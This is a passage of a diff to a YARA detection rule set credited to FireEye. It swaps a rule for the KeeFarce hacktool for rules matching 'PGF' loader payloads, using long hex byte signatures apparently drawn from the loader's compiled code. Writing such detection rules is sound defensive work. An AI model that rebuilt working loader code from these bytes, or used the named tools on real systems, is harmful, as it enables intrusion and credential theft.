B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project."
+		description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads."
 		author = "FireEye"
-		id = "c17add0c-e09f-5ced-a4e1-bf60afad4725"
+		id = "adf91482-6e04-5d11-bc00-4b1c7a802c49"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908"
+		hash = "4414953fa397a41156f6fa4f9462d207"
+		logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide
+		$cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
+		$cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? 